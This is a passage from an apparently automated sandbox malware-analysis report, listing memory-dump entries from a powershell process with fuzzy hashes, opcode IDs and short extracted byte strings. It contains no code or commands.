                                                                                        • Instruction Fuzzy Hash: 9591B0B0B00214DFCB14EF54C944BAEBBB6FB89308F558469E9056F359CB32D942DBA1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (Xoq$LRjq
                                                                                        • API String ID: 0-3603458070
                                                                                        • Opcode ID: f1ae89a2adfbc09a6bfce80c37eb6b7245a184c08b32b5356b526151969e6425
                                                                                        • Instruction ID: 5f1413782608fe8f8a971c255136108e60112deb2de89c0658916e30e8d53984
                                                                                        • Opcode Fuzzy Hash: f1ae89a2adfbc09a6bfce80c37eb6b7245a184c08b32b5356b526151969e6425
                                                                                        • Instruction Fuzzy Hash: 4F626B34B00218CFDB14DB24D890B6DBBB6BF89300F1185A9D9469B3A5DB35EE85CF91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: \V)m$\V)m
                                                                                        • API String ID: 0-2777142676
                                                                                        • Opcode ID: 832976678367380d69d0c53920335d6ad5d9d3910dfc18abef95afd86d72a2af
                                                                                        • Instruction ID: 4e14e27da5c080321feb08aa91349a9f87868188c7808a99395e6079c63d57c2
                                                                                        • Opcode Fuzzy Hash: 832976678367380d69d0c53920335d6ad5d9d3910dfc18abef95afd86d72a2af
                                                                                        • Instruction Fuzzy Hash: D6714F70E00209DFEF14DFA9D98579EBBF2BF48314F14C529D815A7264EB74A841CBA1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: \V)m$\V)m
                                                                                        • API String ID: 0-2777142676
                                                                                        • Opcode ID: 2e05c69a228ad9bdf6990c74a81abc9633093f27f8ae0e418dd789007e7b38dc
                                                                                        • Instruction ID: a141f81c3b2455b3cb07222a34d986a0687cf20cb03b9d77c5592c990e30972d
                                                                                        • Opcode Fuzzy Hash: 2e05c69a228ad9bdf6990c74a81abc9633093f27f8ae0e418dd789007e7b38dc
                                                                                        • Instruction Fuzzy Hash: 6B712D70E00249DFEF10DFA9D98579EBBF2BF48314F14C529D815A7264EB74A441CBA1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (Xoq$LRjq
                                                                                        • API String ID: 0-3603458070
                                                                                        • Opcode ID: 16ce6371936c60ec3f05c644da5624923e2ef3c24c2a5b7408d2220e27dd7272
                                                                                        • Instruction ID: 81ea29968778a679871c73e4577a35b7dd98ac7684ddf77edcc3a36d87b1d18a
                                                                                        • Opcode Fuzzy Hash: 16ce6371936c60ec3f05c644da5624923e2ef3c24c2a5b7408d2220e27dd7272
                                                                                        • Instruction Fuzzy Hash: 27516E34B003188FDB24DF68D850B9DBBB6FF88310F1184A9D9459B3A5DB71AD85CB91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: h])m$I)m
                                                                                        • API String ID: 0-27771872
                                                                                        • Opcode ID: 684a386232a0968a39efb077428f8afbd5fb9d0fe245d1c48f9866f2bd3ee99d
                                                                                        • Instruction ID: 195610f88c09cba6a584b1d107c2536657f914f9d4fe4bcac6977c4c723a609c
                                                                                        • Opcode Fuzzy Hash: 684a386232a0968a39efb077428f8afbd5fb9d0fe245d1c48f9866f2bd3ee99d
                                                                                        • Instruction Fuzzy Hash: F0312C34A011188FCB25DB64C8506EEB7F1BF49345F1044E9D90AAB265CB35AE46CF91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: \V)m
                                                                                        • API String ID: 0-3219898122
                                                                                        • Opcode ID: e4fae6fb1c9471c8330c02c6d78d4a9c759fb7883148afea85cf3aa643fc606c
                                                                                        • Instruction ID: 60cc995e06d1fcfa0476576becd282f542e4831eaef5cb4b18b4170175142b69
                                                                                        • Opcode Fuzzy Hash: e4fae6fb1c9471c8330c02c6d78d4a9c759fb7883148afea85cf3aa643fc606c
                                                                                        • Instruction Fuzzy Hash: DFB13A70E103099FDF10CFA9C9857ADBBF2BF48B14F148529E815EB264EB74A845CB91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $jq
                                                                                        • API String ID: 0-2886413773
                                                                                        • Opcode ID: 2bbc3ea0ede73f9323aa8d508324d03ec246ba96075ff764fe9b61889c3fa7b9
                                                                                        • Instruction ID: 0d878d4d57bb8beaac50381a8dc8b72bc2fb1fa2e76e1f10369dc3ad329b7072
                                                                                        • Opcode Fuzzy Hash: 2bbc3ea0ede73f9323aa8d508324d03ec246ba96075ff764fe9b61889c3fa7b9
                                                                                        • Instruction Fuzzy Hash: 035115B1D00308DFDB14DF9AC884ADEBFB5BF48710F24812AD405AB264DB75A949CF91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $jq
                                                                                        • API String ID: 0-2886413773
                                                                                        • Opcode ID: bab63f8d161ee2eb19e650ed92cdf9149b15df73713b5a9e9c8706ea71faeb57
                                                                                        • Instruction ID: d4253a503ee983b09d706c58710733de8ed067e282bf0e79319f369d5b7b3766
                                                                                        • Opcode Fuzzy Hash: bab63f8d161ee2eb19e650ed92cdf9149b15df73713b5a9e9c8706ea71faeb57
                                                                                        • Instruction Fuzzy Hash: 7E5104B1D00308DBDB10DF9AC884ADEBBB5BF48310F24812AE405AB264DB756945CF90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 822b603ee927c48b75767a41ce17bdcfc76c3b7517d0de3cb66318da77dfad38
                                                                                        • Instruction ID: 984eb6115565e5a60e855177da1b7cc8e8d08dd03799496c8c634869d7bb51a5
                                                                                        • Opcode Fuzzy Hash: 822b603ee927c48b75767a41ce17bdcfc76c3b7517d0de3cb66318da77dfad38
                                                                                        • Instruction Fuzzy Hash: 2DF12934A002199FDF15CF98D584AAEBBF2FF88314F248559E805AB365CB35ED81CB91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a203eba9b2518b1ac5e604346be294bc6664cc9ec4db9dfd7547d971f85366d9
                                                                                        • Instruction ID: e998f5843c06815d4b9b4ca48825a68883a30d9dfb04c7f1a58c9ae7f9507902
                                                                                        • Opcode Fuzzy Hash: a203eba9b2518b1ac5e604346be294bc6664cc9ec4db9dfd7547d971f85366d9
                                                                                        • Instruction Fuzzy Hash: 4FD10674A00219AFDF05DF98D584AADFBB2FF88350F258159E845AB365CB31ED81CB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9f10589c98a393a660bbc98d990ea95c1280b6154a47319358515abdbf5f40f7
                                                                                        • Instruction ID: bcaa6941381109b6226e182d15c13e19616bd4da93827d9fa422a7928272d73e
                                                                                        • Opcode Fuzzy Hash: 9f10589c98a393a660bbc98d990ea95c1280b6154a47319358515abdbf5f40f7
                                                                                        • Instruction Fuzzy Hash: 48B13B70E00219CFDF10CFA9D98579DBBF2BF49314F248529D815EB264EB74A885CBA1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0468b42ff6f62f0fee95fc0e6e33e883ab9cd3287c5c486e0403dd7ad8d84f55
                                                                                        • Instruction ID: 6647165e0efc17d638672eba474fcd080f2752c68c42dde3a6ca259b30d3f969
                                                                                        • Opcode Fuzzy Hash: 0468b42ff6f62f0fee95fc0e6e33e883ab9cd3287c5c486e0403dd7ad8d84f55
                                                                                        • Instruction Fuzzy Hash: C3A18C70A006058FCB05CF9DC5949AEBBF6FF88310B2485A9D815AB3A5DB35FC41CBA0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2152483096.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7920000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 326370dc27824000f571b30271aae3ae5767cfc2a4f1c739e80f9c7cd7327d78
                                                                                        • Instruction ID: 99b219d2e5f91275d778737f67be2c2a9d69c9aea1d800bdb972dba70fc7182a
                                                                                        • Opcode Fuzzy Hash: 326370dc27824000f571b30271aae3ae5767cfc2a4f1c739e80f9c7cd7327d78
                                                                                        • Instruction Fuzzy Hash: EE918EB4A40218DFCB14DF58C554AAABBF6EF89314F14C469E805AF359CB32DC42DBA1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2152483096.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7920000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3bb9bb490ed95dc0425646c4cb7252b195eb694975ad34295b7e1dc49c55a5d2
                                                                                        • Instruction ID: b380e67add3c983aa2f0b427233c1b609581271501f72c62fd836849697b8323
                                                                                        • Opcode Fuzzy Hash: 3bb9bb490ed95dc0425646c4cb7252b195eb694975ad34295b7e1dc49c55a5d2
                                                                                        • Instruction Fuzzy Hash: 52916EB4A00219DFCB14DF58C594A99BBF2FF89318F14C49AD8056B359C732D892DBA0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2152483096.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7920000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 33209887d5eb229a0111b7b56c8ca01148932a1e264a52d0e725b5083c412e18
                                                                                        • Instruction ID: c1d6077e5dc19df5d2d33294b23969847a36f87d1fc10be67a2bd2ffbb3b6174
                                                                                        • Opcode Fuzzy Hash: 33209887d5eb229a0111b7b56c8ca01148932a1e264a52d0e725b5083c412e18
                                                                                        • Instruction Fuzzy Hash: 244176B0B402199FCB10AF648950B7D7BE69FC6308F4884A9D900DB395DA36DD92C7F1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e74fa791830dbc44dcbb6e725f2f98f5ad626fbe5e15388f49553d56af06ab49
                                                                                        • Instruction ID: 53e66abb2fef9facf5337ebab2dbd7ae34a0fc03247324fee8908123ebcf069a
                                                                                        • Opcode Fuzzy Hash: e74fa791830dbc44dcbb6e725f2f98f5ad626fbe5e15388f49553d56af06ab49
                                                                                        • Instruction Fuzzy Hash: C6512834A00209EFDF05CF98D584A9DBBB6FF88314F248558E804AB365CB75EC86CB91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2235a728b4bf62017bdd5086adcd6738b655c01aea2cbbbfe3ddb17cc9e163ac
                                                                                        • Instruction ID: e0216e95644459964e11f4efb223e994f1f732a22bf727287e4bfc5aa8ebe1d3
                                                                                        • Opcode Fuzzy Hash: 2235a728b4bf62017bdd5086adcd6738b655c01aea2cbbbfe3ddb17cc9e163ac
                                                                                        • Instruction Fuzzy Hash: 95419F74A002448FCB15CF5CC894EAABBF1FF99310B248659D855EB3A6D731EC81CB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fdcf88e5c0bbfa1ded31d9df0496ef80c1022bc5ac39aab6032ef39ea5bb164f
                                                                                        • Instruction ID: ccae917446d628762a2f9bccda40ac1b18c5ee56868b0d36ca65ddacf927e181
                                                                                        • Opcode Fuzzy Hash: fdcf88e5c0bbfa1ded31d9df0496ef80c1022bc5ac39aab6032ef39ea5bb164f
                                                                                        • Instruction Fuzzy Hash: 59414774A006099FCB09CF99C598DAEFBB1FF48314B118559D815AB364CB32FD91CBA0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9ffeabef43c9c28b6752d92aad1d7530e29e682fdec79738a8c9690aedce75cb
                                                                                        • Instruction ID: 35f1163101f4f4d143b749889d10cabfb1003f4f704219e9e1c3a2082bedbd85
                                                                                        • Opcode Fuzzy Hash: 9ffeabef43c9c28b6752d92aad1d7530e29e682fdec79738a8c9690aedce75cb
                                                                                        • Instruction Fuzzy Hash: 16319274A042459FCB06DF58C8909AABFB1FF4A314B15819AD845EB362C735EC42CBA1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 335c14a1488311576c80294e1ae7e369b68f134f5aa07bdc62a30b90dddfd3a5
                                                                                        • Instruction ID: c98e6c2f6321808031caa05ec7dd02a43d4a76ddb5dadbc98213c1fa7609a663
                                                                                        • Opcode Fuzzy Hash: 335c14a1488311576c80294e1ae7e369b68f134f5aa07bdc62a30b90dddfd3a5
                                                                                        • Instruction Fuzzy Hash: 994110B1D003489FDB14DFA9C580ADEBFB5FF48314F10802AE809AB224DB75A985CB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ce93f4d2e5cd66d3da250ea5e76c605e8cd54208355eb7ddeec6a8d644ecdc4d
                                                                                        • Instruction ID: 49618ed5f361a473d9eba00f92e9545c20986a9247dd4b6a0ee7c9baa86d535b
                                                                                        • Opcode Fuzzy Hash: ce93f4d2e5cd66d3da250ea5e76c605e8cd54208355eb7ddeec6a8d644ecdc4d
                                                                                        • Instruction Fuzzy Hash: 8741EFB0D003489FDB14DFA9C584ADEBFB5FF48314F14802AE809AB264DB75A945CF90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cd2b0869fe683a93c4cda9306922a0b2169cfd39c1c0c5aba05dcfb7037b8254
                                                                                        • Instruction ID: b9934b4646928f8868e18834e1a8ce91b38211af7b4af5f8e9f0295aa3c0e245
                                                                                        • Opcode Fuzzy Hash: cd2b0869fe683a93c4cda9306922a0b2169cfd39c1c0c5aba05dcfb7037b8254
                                                                                        • Instruction Fuzzy Hash: 15218E34A00208AFCF05CFA8D884E9DBBB6FF88314F248055E845AB375CB71E882CB51
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cb50223816cf8617457964ea969615f12bfff7015eab7bd1469d5871e6d3c3af
                                                                                        • Instruction ID: e7dd22e83cab7d96a2296a826748920fc3804f74cc87ba8d69db52a3fd9f4c31
                                                                                        • Opcode Fuzzy Hash: cb50223816cf8617457964ea969615f12bfff7015eab7bd1469d5871e6d3c3af
                                                                                        • Instruction Fuzzy Hash: C1110A34A00209EFDF05CF98D484E9DBBB2FF48314F288054E805AB365CB71E882CB41
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ac91bd7fdfebc95f7483979b1b79738af223a01525107d0d4cbb7720cf96a1cc
                                                                                        • Instruction ID: b22fe9d650a3fe3741e2cebce88124fa95331c1ebe1061616fd8c8746fa9000b
                                                                                        • Opcode Fuzzy Hash: ac91bd7fdfebc95f7483979b1b79738af223a01525107d0d4cbb7720cf96a1cc
                                                                                        • Instruction Fuzzy Hash: B011B070D20248DFEF24EAA4D9987ECB7B2BB5571DF14142AC801B61B0EF756889CB16
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2146279188.00000000033FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 033FD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_33fd000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8fa62d6dbf5764951fa1b11faba9085d3c2901af5d9a57f01fa848a3f7ab729c
                                                                                        • Instruction ID: 0ccdee3541f1062235dbb8b460d6c75d44a9a3796b0ff9862bf42bc235a68987
                                                                                        • Opcode Fuzzy Hash: 8fa62d6dbf5764951fa1b11faba9085d3c2901af5d9a57f01fa848a3f7ab729c
                                                                                        • Instruction Fuzzy Hash: 1D01DF31004341AFE720CA29CDC8B66BF9CEF46320F18C46AEE480B24AC27D9841CAB1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2146279188.00000000033FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 033FD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_33fd000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0f15dc8b9189344adfe37a33ddb63a2b51795cbd0b86f4eff1af5a3b2c3d7210
                                                                                        • Instruction ID: 96b95cbe7e107e5f3362fabb2042f29bf8e538a728bb96a0de27deb7e4982e7d
                                                                                        • Opcode Fuzzy Hash: 0f15dc8b9189344adfe37a33ddb63a2b51795cbd0b86f4eff1af5a3b2c3d7210
                                                                                        • Instruction Fuzzy Hash: B4012D7100E3C09FD7128B258D94A52BFB8EF47224F1D84DBD9888F2A7C2695849C772
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8b181296c18e74a6fc1ccdfd8a243eb4faeae6b519bc6b3dacc1354a080c6df8
                                                                                        • Instruction ID: 7891e4444d965c862c6edd013f79a2c149fe9ae48df80f4d9ce52252e8d63b21
                                                                                        • Opcode Fuzzy Hash: 8b181296c18e74a6fc1ccdfd8a243eb4faeae6b519bc6b3dacc1354a080c6df8
                                                                                        • Instruction Fuzzy Hash: 9DF09031A00108EFCB14CF98D8849AEF775FF88320B248659D819A7690CB36AC52CB51
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8c261b7dfd4b6cf50c7e8b0de3a9da280c28ab14d1cb6edc17c2688b0ec900d7
                                                                                        • Instruction ID: 57b243f977841329f5e2320b507ba42c5a2f81550b218f0f07be2bc9fef8a2c9
                                                                                        • Opcode Fuzzy Hash: 8c261b7dfd4b6cf50c7e8b0de3a9da280c28ab14d1cb6edc17c2688b0ec900d7
                                                                                        • Instruction Fuzzy Hash: 05E0EDB4D042099F8F44EFF994421BEBBF0AB88200B10887B9869E7340E73956118FD5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a764974084b31877da36572974a574e28e863836bec7fff32f6b89d70547a742
                                                                                        • Instruction ID: b7644eba9185c19b5e3a90cb02f2f3d868d21bff1c3e1edd20be7e01a55f73ab
                                                                                        • Opcode Fuzzy Hash: a764974084b31877da36572974a574e28e863836bec7fff32f6b89d70547a742
                                                                                        • Instruction Fuzzy Hash: 38E026B4E1520E9F8F48EFB995421BEFBF5AB48200F1085AFD819E3340E63456118F95
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b90b6773015c3c9785c59656cd5b67906b38a86a4ba560f2c1d2195adab9f282
                                                                                        • Instruction ID: 18266cd6223bea86ecfeec45cc96ae68768904bbc93ca679b77bc1cef2f178d3
                                                                                        • Opcode Fuzzy Hash: b90b6773015c3c9785c59656cd5b67906b38a86a4ba560f2c1d2195adab9f282
                                                                                        • Instruction Fuzzy Hash: 23D0126190D3449FFB2123A0A00DB643F687FC5305F484193E9AB940A3AB2FE855DAD1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: \V)m
                                                                                        • API String ID: 0-3219898122
                                                                                        • Opcode ID: 74cdea48ea6dfbde98f767d37a0b737ca6df6e211fc98bc9c27f7e0a60aa6011
                                                                                        • Instruction ID: 0951bade5f82e12a00fc6da25141c9b0260df3f9c0ab3e88c52efa40334a563a
                                                                                        • Opcode Fuzzy Hash: 74cdea48ea6dfbde98f767d37a0b737ca6df6e211fc98bc9c27f7e0a60aa6011
                                                                                        • Instruction Fuzzy Hash: C4916D71E103099FDF14CFA9C98179DBBF2BF88714F148529E805EB264EB74A845CB81
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2152483096.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7920000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'jq$4'jq$4'jq$4'jq$`Bth$$jq$$jq$$jq$$jq$$jq$$jq
                                                                                        • API String ID: 0-2600365
                                                                                        • Opcode ID: 726af6766dc8712ad89ab89fcfb2120dcfc9f878729856055cb934cb82473495
                                                                                        • Instruction ID: 9e93538beddb27da708f3fa465f7cae40aadec48107ad823553e84ff0de108d5
                                                                                        • Opcode Fuzzy Hash: 726af6766dc8712ad89ab89fcfb2120dcfc9f878729856055cb934cb82473495
                                                                                        • Instruction Fuzzy Hash: 66A15F71784359DFCB15AB6888106AABBBAEFC1314F24846FD804CB24ADA31C957D791
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2152483096.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7920000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'jq$4'jq$h2uh$tLth$x.sh
                                                                                        • API String ID: 0-1395400759
                                                                                        • Opcode ID: c988a1eb89bb68bee1e707bdbf6211149a14ad844065e6deaa96f5d926062373
                                                                                        • Instruction ID: dfb378a3d69cde76fcf9a15af716097e925a84ada7c4b096bacd7b048caf3faa
                                                                                        • Opcode Fuzzy Hash: c988a1eb89bb68bee1e707bdbf6211149a14ad844065e6deaa96f5d926062373
